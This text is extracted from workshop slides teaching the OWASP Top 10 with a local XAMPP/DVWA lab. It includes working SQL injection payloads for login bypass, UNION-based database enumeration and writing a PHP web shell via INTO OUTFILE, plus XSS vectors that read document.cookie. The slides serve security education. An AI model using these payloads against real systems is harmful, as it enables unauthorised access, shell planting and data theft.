Mission :- Understand / Learn / Practice OWASP Web Security Vulnerabilities https://www.owasp.org/index.php/Top102013-Top_10 In this session, Attendees will perform hands-on exercises to get a better understanding of the OWASP top ten security threats.
3.
WHO AM I
I' m Next-Gen Exploratory Testy
Student of Information Security field
Researcher & Reader in free time
Member of
Crowd Tester (AKA. Bug bounty Hunter)
Proficient at Functional, Usability , Accessibility & Compatibility Testing
Love to develop nasty code & Hack it :)
Works as Quality Analyst at
AKA. Bug Wrangler
Null Open Security Co mmunity
passbrains.com
4. DISCLAIMER
This presentation is intended for educational purpose only and I cannot be held liable for
any kind of damages done, whatsoever to your machine, or any other damages.
Don't try this attack on any other system without having context knowledge or permission,
this may harm someone directly or indirectly.
Feel free to use this presentation for practice or education purpose.
^ I hope - You gotcha ^
5. ~ WE AREN'T GOING TO DO THIS ~
So, feel free to stop when you have a doubt!
Are you Ready to Rock ???
6. AGENDA
Why Web Application Security Testing ?
Myths, you'll hear - but Do you believe ?
What is OWASP, what do they provide ?
OWASP Web Top - 10 Publication
How web works ?
Proof of Concept for Top - 10 attack
Self exploratory exercise on Top - 10
Learn + Hack
Q & A
7. FOR SOCIAL MEDIA
Twitter handle
@ @null0x00 Abhinav_Sejpal
Hashtag for this session
# #Nullhumla nullblr
13. OBJECTIVES FOR THIS SESSION
BUILD SECURITY AWARENESS FOR WEB
APPLICATION
GET TO KNOW ATTACK METHOD OF HACKERS
LEARN WAY TO DISCOVER SECURITY
VULNERABILITIES
LEARN BASIC OF SECURE WEB APPLICATION VIA
OWASP TOP 10
15. HERE IS THE ANSWER !
Increases vulnerability to attacks
Damage to your reputation and brand value
Loss of customer confidence & potential business
Disturbance to your online means of revenue collection
Legal liability
Website downtime, loss of time & resources in mitigating the damage
Additional costs and regression testing associated with securing web
applications for future attacks
And much more! Boom - Isn't it?
The average loss reported in the 2007 CSI Computer Crime and Security
Survey was $350,424.
18. DON'T BELIEVE IN MYTHS!
Secure Socket Layer (SSL / HTTPS) protects my website.
Buy this one tool and it will solve all my problems.
We don’t have anything worth to be stolen.
{Java - Insert Name here} is a secured language.
We can't possibly be a target.
We never had any data breaches on our organization and we are
safe. Our technical team is much smart. #facepalm
We have a firewall setup (WAF) - Nothing to worry! You wish
You're safer on a mobile site as compared to a desktop.
Can come up with umpteen more!
19. SO, DO YOU ALL AGREE THAT
WEB APPLICATION SECURITY IS
ESSENTIAL?
20. MY OPINION
SECURITY TESTING IS ALWAYS A RACE BETWEEN HACKERS AND THE
SECURITY COMPANIES TO GET ONE STEP AHEAD OF EACH OTHER.
21. RISK MANAGEMENT
THE WEB WILL NEVER BE 100 PER CENT SECURE, BUT WITH GOOD
DUE DILIGENCE, IT CAN BE ONE OF THE SAFEST PLACES ON EARTH TO
DO BUSINESS.
AFTER ALL, OUR PRIMARY CONCERN IS SEAMLESS BUSINESS.
There we stand ^ Web application Security Ninja's ^
23. OWASP -THE OPEN WEB
APPLICATION SECURITY PROJECT
(OWASP) is a 501c3 not for-profit worldwide charitable organization
Everyone is free to participate in OWASP and all the materials are
available under a free and open software license
It provides a free access to community resources and events:
Publications, Articles
Standard Testing and Training Software
Local Chapters & Mailings List
World-wide conferences
24. OWASP ROLE
Make application security visible, so that people and
organizations can make informed decisions about true
application security risk!
25. What do we mean by OWASP Top 10 Web Application
Security Vulnerabilities ?
A list of the 10 most severe security issues f requently occur in
web applications.
It’s a list of vulnerabilities that require immediate remediation.
Existing code should be checked for these vulnerabilities, as these
flaws are effectively targeted by attackers.
New updates on tithe year (third year sequence).
Strong push to present as a standard
26. Are we sure that this survey results are trustworthy ?
This wiki is not a standard or a policy. It provides a brief
description of the vulnerabilities, and methods of
This is nothing but
Top ten web application security hazards
recommended by OWASP Survey.
^ Myth Involved Here^
27. prevention.
LET'S BEGIN OUR JOURNEY
OF
TOP 10 WEB APPLICATION SECURITY
HAZARDS
I don't want to showcase top ten - let's start with baby
steps
32. I have questions?
Does the user input go through any validation at user’s web browser?
Does Business Logic verify the user inputs at server side?
If your answer is 'No', then be ready for the 'Nightmare'
33. Conclusion
Modern websites rely on user input for everything.
They are basically applications which expect various kinds
of inputs coming from users to function a certain way.
~ Courtesy ~@makash
34. Could be Command / SQL statement
I AM THAT BAD INPUT
'INJECTION '
OWASP #A1
35. WHAT IS SQL ?
SQL stands for Structured Query Language.
Execute queries against a database
Retrieve data from a database
Insert new records in a database
Delete records from a database
In short, All DB operations :)
38. IT'S ME - SQL INJECTION
PEOPLE CALL ME SQLI ALSO
'YES' - I AM A BOTTLENECK FOR DEVELOPERS SINCE MANY YEARS
Smart Geeks opt for me along with user inputs & perform attack.
39. PREVIOUS ATTACKS VIA SQLI
SQL injection has been responsible for 83% of all
successful hacking-related data
breaches, from 2005-2011.
(Source: Privacyrights.org)
Automation Infects 100,000s: In 2008,
SQLi attacks became automated via the
use of botnets. Mass website infection
incidents include 500,000 reported in
2008; 210,000 in 2009; 500,000 in 2010 and
380,000 in 2011.
40. SQLI FACTS
Dominant Source of Attack: 97
percent
of data breaches worldwide are due
to
SQL injection.
(Source: National Fraud Authority UK)
Web Application Risk: SQL Injection was the leading
Web application risk of 2011. It ranks as one
of the most common software vulnerabilities in
survey after survey(Source: Trustwave)
41. CAKE PHP
Struts 2
Spring
GWT (Google Web toolkit)
MYTHS
SQLi is old days' problem - I shouldn't worry about this.
^^
I am using Java / PHP / RUBY / ASP modern days'
framework.
47. for:
Setup the Test Lab
Install XAMPP
Acronym
X (to be read as "cross", meaning )cross-platform
Apache HTTP Server
MySQL
PHP
Perl
48. TARGETED APPLICATION
Client Side language : HTML & Javascript
Server side Language: PHP
DB : MYSQL
Why PHP ? - Any answer Here?
Why MySQL? MySQL is Girlfriend of PHP <3
49. PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE
PROGRAMMING LANGUAGE.
http://w3techs.com/technologies/overview/programming_lang
51. 2013 Server-side Programming Language of the Year
Don't Mind Power of PHP > Facebook & yahoo
http://w3techs.com/blog/entry/web_technologies_of_the_year
53. CONCEPT
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND
password = "pass"
Basic PHP statement for Login page :-
SELECT * FROM users where username='".$username."' AND
password = '".md5($pass)."'"
*Md5() method is used to encrypt the password.
* Demo at SQL *
54. CHEAT SHEET
#Attack - 1
SELECT * FROM `users` WHERE `username` ='admin' or
'1'='1' and password ='I dont know'
Injection code :-
admin' or '1'='1
55. WHY ?
Attack 1 is rely on 'User name'
SELECT * FROM `users` WHERE `username` =' admin' or
'1'='1 ' and password ='I dont know'
Can't perform this attack on password field due to
encryption.
User name = anything' or '1' ='1
password = anything' or '1'='1
57. LEARNING FROM THE ATTACK 1
User name is known i.e. 'admin'
Append SQL statement with user name
<It simply works>
But you can't perform this attack without user name
60. CONCEPT
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND
password = "pass"
What if - I insert comments in first attack
SELECT * FROM users where username=" admin" or '1' ='1'
# AND password = "pass"
<< AND password = " pass" >> doesn't execute all
61. IF YOU GET ME - ATTACK DOESN'T
REQUIRE USER NAME NOW
SELECT * FROM users where username=" admin" or '1' ='1'
# AND password = "pass"
SQL statement will be always true due '1' = '1' thus doesn't
matter, you are knowing user name or not.
Yes - I am done. but what if ' #' is not valid input?
62. (-- ) WORKS FOR YOU BUDDY!
* --(space) is syntax
admin' or '1' = '1' --: False
admin' or '1' = '1' -- : True
Mostly people forget to add space, so I use below vector
admin' or '1' = '1' -- space + any one character
E.G. > admin' or '1' = '1' -- Sandy
63. SO, WHAT DO YOU THINK,
SQL IS ALL ABOUT 1=1?
ssshhh - Do you hear that? - NO
64. DUMP SENSITIVE DB INFO
* Identify column gets selected.
* Identify the data set which value will be displayed.
a%' union select 1,2,3,4,5 from users #
a%' union select 1 ,@@datadir,2,3,4 from users #
a%' union select 1 ,@@version,3,4,5 from users #
66. TABLE ENUMERATION
a%' union select 1, table_schema, table_name,3,4 from
information_schema.tables #
a%' union select 1, table_schema, table_name,3,4 from
information_schema.tables where
table_schema='sqlhumla'#
67. - Text File Writing
SHELL INJECTION
Into outfile
I want to save a MySQL query result to a text file like this:
<span class="kwd">SELECT</span>
<span class="pln"></span>
<span class="pun">*</span>
<span class="pln"></span>
<span class="kwd">FROM</span>
<span class="pln"> orders </span>
<span class="kwd">INTO</span>
<span class="pln"> OUTFILE </span>
<span class="str">'/data.txt'</span>
68. Can we append the same logic with our injection?
user=frodo' into outfile 'test.txt'; -- comments
69. SHELL INJECTION
'Hello world' PHP File Writing at current folder
=FRODO' INTO OUTFILE "../../HTDOCS/XAMPP/SQLI/TEST.TXT"; - A
Select * from users where username = 'frodo' union select
1,2,3," <?php echo "Hello World"; ?> ",5 from users into
outfile '../../htdocs/xampp/sqli/ shellTest.php'; -- a
70. PHP SHELL CODE
<?php $output = shell_exec('Test'); echo
'<pre>$output</pre>'; ?>
Append the same as SQL injection
user=frodo' union select 1,2,3, " <?php $output =
shell_exec('test'); echo '<pre>$output</pre>'; ?>", 5 from
users into outfile '../../htdocs/xampp/sqli/shell.php'; -- a
72. PLAY GROUND
DAMN VULNERABLE WEB APP
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web
application that is damn vulnerable. Its main goals are to be
an aid for security professionals to test their skills and tools
in a legal environment.
http://www.dvwa.co.uk/
https://github.com/RandomStorm/DVWA
79. WHAT IS XSS ?
http://appsandsecurity.blogsplot.de/2012/11/is-xss-solved.html
OWASP says "Cross-Site Scripting (XSS) attacks are a type of
injection, in which malicious scripts are injected into
otherwise benign and trusted web sites.
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
80. SO WHERE DOES XSS STAND?
ACCORDING TO WHITE HAT, 53% WEB APPLICATIONS HAVE XSS
VULNERABILITY.
https://www.whitehatsec.com/assets/WPstatsReport_052013.p
81. DO YOU KNOW,
81 OUT OF 100 POPULAR MOBILE
WEBSITES ARE VULNERABLE TO
XSS?
http://www.nds.rub.de/media/nds/veroeffentlichungen/2013/08
90. (AKA NON-PERSISTENT)REFLECTED XSS
Reflected XSS occurs when user input is immediately
returned by a web application in an error message, search
result, or any other response that includes some or all of the
input provided by the user as part of the request, without
that data being made safe to render in the browser, and
without permanently storing the user provided data.
https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting
93. I T IS STORED XSS
Live
http://mmqb.si.com/2014/08/20/san-francisco-49ers-new-stadium-training-camp-thoughts-
peter-king-video/#mmqb_livefyre_comm_bellow/autostart/
Vector : Under BIO :- </p></script> <img src=1
onerror=alert(document.cookie);>
94. STORED XSS
Stored XSS generally occurs when user input is stored on the
target server, such as in a database, in a message forum,
visitor log, comment field, etc. And then a victim is able to
retrieve the stored data from the web application.
95. #XSS WRITE-UP BY ASHAR
http://www.scribd.com/doc/210121412/XSS-is-not-going-
anywhere
96. OH NO, THERE IS AN XSS IN YOUR JS
http://127.0.0.1/xampp/DOM%20XSS/domxss_demo_1.html#
<img src=nonexistent onerror=alert(1)>
98. Understand the Logic
When Source gets synced?
An attacker may append a JS to the affected page URL
which would, when executed, display the alert box.
Impact would show only on - Client side JS
99. IF YOU WANT TO KNOW MORE
ABOUT DOM BASED XSS THEN
PLEASE BUG " "@LAVAKUMARK
More Info at : https://ironwasp.org/
100. <shhh - Very low priority but should be acknowledged >
NO MORE TALK ABOUT SELF XSS
102. Am I Vulnerable To 'Broken Authentication &
Session Management'?
A2 - OWASP TOP 10
103.
104.
105. So, Let's Learn about Web App DB structure
Passwords are stored in plain text.
oh really -- ':(
OWASP #A6
106. Password is protected, when stored using encryption
algorithm. Are you sure?
http://www.md5online.org/
107. YOU MAY ALSO TRY OUT HASH BUT PASSWORD SALT IS A
RECOMMENDED SOLUTION SO FAR.
P ASSWORD POLICY SHOULD BE APPLIED NICELY AND SHOULD NOT BE WEAKER.
-- * --
SECURITY & BUSINESS LOGIC SHOULD BE APPLIED FOR CHANGING PASSWORD. CHANGE
PASSWORD DOESN'T ASK FOR CURRENT PASSWORD - LOL
131. if you are planning to host your own server
this talk matters for you
"SECURING A LINUX WEB SERVER IN 10 STEP S"
BY A KASH MAHAJAN
https://www.youtube.com/watch?v=ort9qxzu3h0
132. YES - I'M DONE!
Feel free to write me at bug.wrangler at outlook.com
134. WE NEED YOU!
Attend Null Meets-up & give presentations.
Share your ideas & leanings.
Talk to our community champions & gain from leanings.
Your feedback helps us to build a good community.
Looking forward to your ongoing support.
HTTP://NULL.CO.IN/
Say 'Hello' @null0x00
135. - Twitter Folks -
@ , @ , @
@ , @ , @
@ ,
#Nullblr Leads & Champions
Big thank you to @ ,@ & you All.
CREDITS
riyazwalikar anantshri makash
TroyHunt yog3sharma soaj1664ashar
@ MohammedAImran ru94mb
@ LAVAKUMARK , @1_NEHA
null0x00 JubbaOnJeans